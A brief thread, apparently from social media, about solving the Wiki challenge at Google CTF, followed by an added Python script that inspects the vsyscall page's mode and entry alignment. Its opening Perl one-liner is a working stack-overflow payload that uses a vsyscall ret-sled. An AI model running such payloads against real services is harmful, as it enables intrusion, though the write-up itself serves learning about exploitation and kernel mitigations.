"Writeup" for Wiki at #GoogleCTF
perl -e 'print "USER\n1MB\@tMaN\nPASS\n"."a"x152 .pack("Q",0xffffffffff600000)x23 ."\n"."\0"x8 ."\n"'
The gist of it is: stack-based BOF in PASS handler, with no info leak. Write RET-sled using vsyscall gadget... (1/2)
Wasted so much time on this. Your sol. works, but using 0xffffffffff600007 or 0xffffffffff600009 for the "ret sled" doesn't, not sure why?
If you look at dmesg, it should tell you that the process was killed because of a misaligned jump to vsyscall. This is a kernel mitigation.
In fact @tehjh told me yesterday that the whole page is basically fake and it is only simulated by the kernel, that's how it controls access
you can see that the kernel emulates the whole function, including syscall and return, and generates segfaults on -EFAULT
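An added example, not part of the thread: a small Python check of how the vsyscall page is exposed on a host, and of the entry-point alignment rule that makes the odd addresses above die. It parses the [vsyscall] line of /proc/<pid>/maps (the sample maps text below is constructed) and classifies the kernel's vsyscall mode; the alignment rule follows the kernel's emulation, which only accepts the three 1024-byte-spaced entry points.

```python
"""Classify the vsyscall page state from /proc/<pid>/maps and check entry alignment."""
import re

VSYSCALL_BASE = 0xFFFFFFFFFF600000
# The emulated page has exactly three entry points, 0x400 bytes apart:
# gettimeofday (+0x000), time (+0x400), getcpu (+0x800).
VSYSCALL_ENTRIES = (VSYSCALL_BASE, VSYSCALL_BASE + 0x400, VSYSCALL_BASE + 0x800)

# Constructed sample maps excerpts (stack line is filler; the [vsyscall] line is what matters).
SAMPLE_EMULATE = (
    "7ffd12345000-7ffd12366000 rw-p 00000000 00:00 0                          [stack]\n"
    "ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]\n"
)
SAMPLE_XONLY = (
    "7ffd12345000-7ffd12366000 rw-p 00000000 00:00 0                          [stack]\n"
    "ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]\n"
)
SAMPLE_NONE = "7ffd12345000-7ffd12366000 rw-p 00000000 00:00 0                          [stack]\n"


def vsyscall_mode(maps_text):
    """Return 'none', 'xonly', 'emulate' or 'unknown' for a /proc/<pid>/maps dump.

    none    : no [vsyscall] mapping (vsyscall=none); the fixed-address page is gone
    xonly   : mapped --xp (vsyscall=xonly); not readable, entry points still jumpable
    emulate : mapped r-xp (vsyscall=emulate); readable and jumpable, calls emulated
    """
    for line in maps_text.splitlines():
        if not line.rstrip().endswith("[vsyscall]"):
            continue
        m = re.match(r"([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})", line)
        if not m or int(m.group(1), 16) != VSYSCALL_BASE:
            return "unknown"
        perms = m.group(3)
        if perms.startswith("r-x"):
            return "emulate"
        if perms.startswith("--x"):
            return "xonly"
        return "unknown"
    return "none"


def is_aligned_entry(addr):
    """True only for the three emulated entry points. Any other address inside the page
    (e.g. base + 7) is a misaligned vsyscall: the kernel logs a warning and sends SIGSEGV."""
    return addr in VSYSCALL_ENTRIES


if __name__ == "__main__":
    with open("/proc/self/maps") as f:  # Linux only; reads this process's own mappings
        print("vsyscall mode on this host:", vsyscall_mode(f.read()))
```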